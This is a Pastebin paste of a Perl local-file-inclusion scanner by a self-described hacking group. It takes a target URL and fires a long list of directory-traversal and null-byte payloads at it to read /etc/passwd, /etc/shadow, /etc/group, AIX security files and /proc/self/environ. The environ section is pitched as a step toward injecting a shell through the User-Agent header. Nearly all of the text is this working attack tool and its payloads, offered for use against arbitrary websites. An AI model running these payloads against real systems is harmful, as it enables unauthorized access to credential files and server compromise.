API tools faq
paste
Advertisement
3xploit3r

LFI Scanner

3xploit3r
Aug 14th, 2016
361
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.71 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. #1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  3. #0 _ __ __ __ 1
  4. #1 /' \ __ /'__`\ /\ \__ /'__`\ 0
  5. #0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
  6. #1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
  7. #0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
  8. #1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
  9. #0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
  10. #1 \ \____/ >> Exploit database separated by exploit 0
  11. #0 \/___/ type (local, remote, DoS, etc.) 1
  12. #1 1
  13. #0 [+] Site : 1337day.com 0
  14. #1 [+] Support e-mail : submit[at]1337day.com 1
  15. #0 0
  16. #1 ######################################### 1
  17. #0 I'm The Black Devils member from Inj3ct0r Team 1
  18. #1 ######################################### 0
  19. #0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  20.  
  21. use HTTP::Request;
  22. use LWP::UserAgent;
  23. system("title The Black Devils");
  24. system("color 1e");
  25. system ("cls");
  26. print " |=======================================================|\n";
  27. print " |= [!] Name : LFI Scanner Ver 1.0.0 Perl =|\n";
  28. print " |= [!] Author : The Black Devils =|\n";
  29. print " |= [!] Mail: mr.k4rizma(at)gmail(dot)com =|\n";
  30. print " |=======================================================|\n";
  31. print "\n\n";
  32. sleep (1);
  33. print "\t\t\t\t WELCOME\n";
  34. print "\n\n";
  35. menu:;
  36. print "\tMenu:\n";
  37. print "\t ID [1] => Passwd,Log";
  38. print "\t[Scan Files Of /etc/ Directory]\n";
  39. print "\t ID [2] =>Environ";
  40. print "\t[Scan Environ File For Inject Shell By U-Agent]\n";
  41. print"\n";
  42. print "\t\t Select ID For Start Scanner :";
  43. $menu = <>;
  44. if ($menu =~ /1/){
  45. goto lfi;
  46. }
  47. if ($menu =~ /2/){
  48. goto env;
  49. }
  50. else {
  51. print"\n\n";
  52. print "\t\tUnknow Command\n";
  53. goto menu;
  54. };
  55.  
  56.  
  57. lfi:;
  58. print "\n\n";
  59. print "\t\t\tWelcome To /etc/ Section With New Method\n\n";
  60. print "\t Insert Target (ex: http://www.xxx.com/index.php?page=)\n";
  61. print "\t Target :";
  62. $host=<STDIN>;
  63. chomp($host);
  64. if($host !~ /http:\/\//) { $host = "http://$host"; };
  65.  
  66. print "\n\n";
  67. print "\t\t*-*-*-*-*-* Start Scanning /etc/ Section *-*-*-*-*-*\n";
  68. print "\n\n";
  69. @lfi = ('../etc/passwd',
  70. '../../etc/passwd',
  71. '../../../etc/passwd',
  72. '../../../../etc/passwd',
  73. '../../../../../etc/passwd',
  74. '../../../../../../etc/passwd',
  75. '../../../../../../../etc/passwd',
  76. '../../../../../../../../etc/passwd',
  77. '../../../../../../../../../etc/passwd',
  78. '../../../../../../../../../../etc/passwd',
  79. '../../../../../../../../../../../etc/passwd',
  80. '../../../../../../../../../../../../etc/passwd',
  81. '../../../../../../../../../../../../../etc/passwd',
  82. '../../../../../../../../../../../../../../etc/passwd',
  83. '../../../../../../../../../../../../../../../../etc/passwd',
  84. '....//etc/passwd',
  85. '....//....//etc/passwd',
  86. '....//....//....//etc/passwd',
  87. '....//....//....//....//etc/passwd',
  88. '....//....//....//....//....//etc/passwd',
  89. '....//....//....//....//....//....//etc/passwd',
  90. '....//....//....//....//....//....//....//etc/passwd',
  91. '....//....//....//....//....//....//....//....//etc/passwd',
  92. '....//....//....//....//....//....//....//....//....//etc/passwd',
  93. '....//....//....//....//....//....//....//....//....//....//etc/passwd',
  94. '../../etc/passwd%00',
  95. '../../../etc/passwd%00',
  96. '../../../../etc/passwd%00',
  97. '../../../../../etc/passwd%00',
  98. '../../../../../../etc/passwd%00',
  99. '../../../../../../../etc/passwd%00',
  100. '../../../../../../../../etc/passwd%00',
  101. '../../../../../../../../../etc/passwd%00',
  102. '../../../../../../../../../../etc/passwd%00',
  103. '../../../../../../../../../../../etc/passwd%00',
  104. '../../../../../../../../../../../../etc/passwd%00',
  105. '../../../../../../../../../../../../../etc/passwd%00',
  106. '../../../../../../../../../../../../../../etc/passwd%00',
  107. '../../../../../../../../../../../../../../../../etc/passwd%00',
  108. '....//etc/passwd%00',
  109. '....//....//etc/passwd%00',
  110. '....//....//....//etc/passwd%00',
  111. '....//....//....//....//etc/passwd%00',
  112. '....//....//....//....//....//etc/passwd%00',
  113. '....//....//....//....//....//....//etc/passwd%00',
  114. '....//....//....//....//....//....//....//etc/passwd%00',
  115. '....//....//....//....//....//....//....//....//etc/passwd%00',
  116. '....//....//....//....//....//....//....//....//....//etc/passwd%00',
  117. '....//....//....//....//....//....//....//....//....//....//etc/passwd%00',
  118. '../etc/shadow',
  119. '../../etc/shadow',
  120. '../../../etc/shadow',
  121. '../../../../etc/shadow',
  122. '../../../../../etc/shadow',
  123. '../../../../../../etc/shadow',
  124. '../../../../../../../etc/shadow',
  125. '../../../../../../../../etc/shadow',
  126. '../../../../../../../../../etc/shadow',
  127. '../../../../../../../../../../etc/shadow',
  128. '../../../../../../../../../../../etc/shadow',
  129. '../../../../../../../../../../../../etc/shadow',
  130. '../../../../../../../../../../../../../etc/shadow',
  131. '../../../../../../../../../../../../../../etc/shadow',
  132. '../etc/shadow%00',
  133. '../../etc/shadow%00',
  134. '../../../etc/shadow%00',
  135. '../../../../etc/shadow%00',
  136. '../../../../../etc/shadow%00',
  137. '../../../../../../etc/shadow%00',
  138. '../../../../../../../etc/shadow%00',
  139. '../../../../../../../../etc/shadow%00',
  140. '../../../../../../../../../etc/shadow%00',
  141. '../../../../../../../../../../etc/shadow%00',
  142. '../../../../../../../../../../../etc/shadow%00',
  143. '../../../../../../../../../../../../etc/shadow%00',
  144. '../../../../../../../../../../../../../etc/shadow%00',
  145. '../../../../../../../../../../../../../../etc/shadow%00',
  146. '../etc/group',
  147. '../../etc/group',
  148. '../../../etc/group',
  149. '../../../../etc/group',
  150. '../../../../../etc/group',
  151. '../../../../../../etc/group',
  152. '../../../../../../../etc/group',
  153. '../../../../../../../../etc/group',
  154. '../../../../../../../../../etc/group',
  155. '../../../../../../../../../../etc/group',
  156. '../../../../../../../../../../../etc/group',
  157. '../../../../../../../../../../../../etc/group',
  158. '../../../../../../../../../../../../../etc/group',
  159. '../../../../../../../../../../../../../../etc/group',
  160. '../etc/group%00',
  161. '../../etc/group%00',
  162. '../../../etc/group%00',
  163. '../../../../etc/group%00',
  164. '../../../../../etc/group%00',
  165. '../../../../../../etc/group%00',
  166. '../../../../../../../etc/group%00',
  167. '../../../../../../../../etc/group%00',
  168. '../../../../../../../../../etc/group%00',
  169. '../../../../../../../../../../etc/group%00',
  170. '../../../../../../../../../../../etc/group%00',
  171. '../../../../../../../../../../../../etc/group%00',
  172. '../../../../../../../../../../../../../etc/group%00',
  173. '../../../../../../../../../../../../../../etc/group%00',
  174. '../etc/security/group',
  175. '../../etc/security/group',
  176. '../../../etc/security/group',
  177. '../../../../etc/security/group',
  178. '../../../../../etc/security/group',
  179. '../../../../../../etc/security/group',
  180. '../../../../../../../etc/security/group',
  181. '../../../../../../../../etc/security/group',
  182. '../../../../../../../../../etc/security/group',
  183. '../../../../../../../../../../etc/security/group',
  184. '../../../../../../../../../../../etc/security/group',
  185. '../etc/security/group%00',
  186. '../../etc/security/group%00',
  187. '../../../etc/security/group%00',
  188. '../../../../etc/security/group%00',
  189. '../../../../../etc/security/group%00',
  190. '../../../../../../etc/security/group%00',
  191. '../../../../../../../etc/security/group%00',
  192. '../../../../../../../../etc/security/group%00',
  193. '../../../../../../../../../etc/security/group%00',
  194. '../../../../../../../../../../etc/security/group%00',
  195. '../../../../../../../../../../../etc/security/group%00',
  196. '../etc/security/passwd',
  197. '../../etc/security/passwd',
  198. '../../../etc/security/passwd',
  199. '../../../../etc/security/passwd',
  200. '../../../../../etc/security/passwd',
  201. '../../../../../../etc/security/passwd',
  202. '../../../../../../../etc/security/passwd',
  203. '../../../../../../../../etc/security/passwd',
  204. '../../../../../../../../../etc/security/passwd',
  205. '../../../../../../../../../../etc/security/passwd',
  206. '../../../../../../../../../../../etc/security/passwd',
  207. '../../../../../../../../../../../../etc/security/passwd',
  208. '../../../../../../../../../../../../../etc/security/passwd',
  209. '../../../../../../../../../../../../../../etc/security/passwd',
  210. '../etc/security/passwd%00',
  211. '../../etc/security/passwd%00',
  212. '../../../etc/security/passwd%00',
  213. '../../../../etc/security/passwd%00',
  214. '../../../../../etc/security/passwd%00',
  215. '../../../../../../etc/security/passwd%00',
  216. '../../../../../../../etc/security/passwd%00',
  217. '../../../../../../../../etc/security/passwd%00',
  218. '../../../../../../../../../etc/security/passwd%00',
  219. '../../../../../../../../../../etc/security/passwd%00',
  220. '../../../../../../../../../../../etc/security/passwd%00',
  221. '../../../../../../../../../../../../etc/security/passwd%00',
  222. '../../../../../../../../../../../../../etc/security/passwd%00',
  223. '../../../../../../../../../../../../../../etc/security/passwd%00',
  224. '../etc/security/user',
  225. '../../etc/security/user',
  226. '../../../etc/security/user',
  227. '../../../../etc/security/user',
  228. '../../../../../etc/security/user',
  229. '../../../../../../etc/security/user',
  230. '../../../../../../../etc/security/user',
  231. '../../../../../../../../etc/security/user',
  232. '../../../../../../../../../etc/security/user',
  233. '../../../../../../../../../../etc/security/user',
  234. '../../../../../../../../../../../etc/security/user',
  235. '../../../../../../../../../../../../etc/security/user',
  236. '../../../../../../../../../../../../../etc/security/user',
  237. '../etc/security/user%00',
  238. '../../etc/security/user%00',
  239. '../../../etc/security/user%00',
  240. '../../../../etc/security/user%00',
  241. '../../../../../etc/security/user%00',
  242. '../../../../../../etc/security/user%00',
  243. '../../../../../../../etc/security/user%00',
  244. '../../../../../../../../etc/security/user%00',
  245. '../../../../../../../../../etc/security/user%00',
  246. '../../../../../../../../../../etc/security/user%00',
  247. '../../../../../../../../../../../etc/security/user%00',
  248. '../../../../../../../../../../../../etc/security/user%00',
  249. '../../../../../../../../../../../../../etc/security/user%00');
  250.  
  251.  
  252. foreach $scan(@lfi){
  253.  
  254. $url = $host.$scan;
  255. $request = HTTP::Request->new(GET=>$url);
  256. $useragent = LWP::UserAgent->new();
  257.  
  258. $response = $useragent->request($request);
  259. if ($response->is_success && $response->content =~ /root:x:/) { $msg = Vulnerability;}
  260. else { $msg = "Not Infected";}
  261. print "$scan..........[$msg]\n";
  262. }
  263. env:;
  264. print "\n\n";
  265. print "\t\t\tWelcom To Environ Section\n\n";
  266. print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n";
  267. print "\t Target :";
  268. $host=<STDIN>;
  269. chomp($host);
  270. if($host !~ /http:\/\//) { $host = "http://$host"; };
  271.  
  272. print "\n\n";
  273. print "\t\t*-*-*-*-*-* Start Scanning Environ *-*-*-*-*-*\n";
  274. print "\n\n";
  275.  
  276. @env = ('../proc/self/environ',
  277. '../../proc/self/environ',
  278. '../../../proc/self/environ',
  279. '../../../../proc/self/environ',
  280. '../../../../../proc/self/environ',
  281. '../../../../../../proc/self/environ',
  282. '../../../../../../../proc/self/environ',
  283. '../../../../../../../../proc/self/environ',
  284. '../../../../../../../../../proc/self/environ',
  285. '../../../../../../../../../../proc/self/environ',
  286. '../../../../../../../../../../../proc/self/environ',
  287. '../../../../../../../../../../../../proc/self/environ',
  288. '../../../../../../../../../../../../../proc/self/environ',
  289. '../../../../../../../../../../../../../../proc/self/environ',
  290. '../proc/self/environ%00',
  291. '../../proc/self/environ%00',
  292. '../../../proc/self/environ%00',
  293. '../../../../proc/self/environ%00',
  294. '../../../../../proc/self/environ%00',
  295. '../../../../../../proc/self/environ%00',
  296. '../../../../../../../proc/self/environ%00',
  297. '../../../../../../../../proc/self/environ%00',
  298. '../../../../../../../../../proc/self/environ%00',
  299. '../../../../../../../../../../proc/self/environ%00',
  300. '../../../../../../../../../../../proc/self/environ%00',
  301. '../../../../../../../../../../../../proc/self/environ%00',
  302. '../../../../../../../../../../../../../proc/self/environ%00',
  303. '../../../../../../../../../../../../../../proc/self/environ%00');
  304.  
  305. foreach $scan_env(@env){
  306.  
  307. $url = $host.$scan_env;
  308. $request = HTTP::Request->new(GET=>$url);
  309. $useragent = LWP::UserAgent->new();
  310.  
  311. $response = $useragent->request($request);
  312. if ($response->is_success && $response->content =~ /HTTP_ACCEPT/ && $response->content =~ /HTTP_HOST/) { $msg = Vulnerability;}
  313. else { $msg = "Not Infected";}
  314. print "$scan_env..........[$msg]\n";
  315. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!